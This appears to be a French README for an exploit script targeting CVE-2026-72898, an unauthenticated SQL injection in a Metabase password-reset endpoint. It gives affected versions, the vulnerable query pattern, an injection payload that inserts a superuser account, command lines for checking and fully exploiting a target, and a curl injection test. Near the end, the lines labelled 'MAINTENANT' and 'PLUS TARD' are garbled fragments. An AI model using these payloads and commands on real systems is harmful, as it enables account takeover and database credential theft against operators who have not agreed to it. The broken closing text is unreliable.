
Exploit Python pour CVE-2026-72898, une injection SQL non authentifiée dans le point de terminaison de réinitialisation de mot de passe de Metabase qui crée des comptes administrateur et extrait les identifiants de base de données.

Injection SQL non authentifiée dans le point de terminaison /api/session/reset_password de Metabase. Crée des comptes administrateurs et extrait les identifiants de base de données.
Affecté : v58.0 - v63.3 | Corrigé : v58.24+, v59.21+, v60.17+, v61.11+, v62.9+, v63.5+
pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check
Concaténation de chaînes dans la requête SQL :
# Vulnerable code
query = f"SELECT * FROM core_user WHERE email='{email}'"
Charge utile d'attaque :
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --
Vérification uniquement (sans modification) :
python3 CVE-2026-72898.py http://localhost:5000 --check
Exploitation complète :
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!
Test manuel :
# Verify endpoint
curl http://localhost:5000/api/health
# Test SQLi
curl -X POST http://localhost:5000/api/session/reset_password \
-H "Content-Type: application/json" \
-d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'
MAINTENANT :
/api/session/reset_password via WAFPLUS TARD :
Utilisation autorisée uniquement. Tout accès non autorisé est illégal.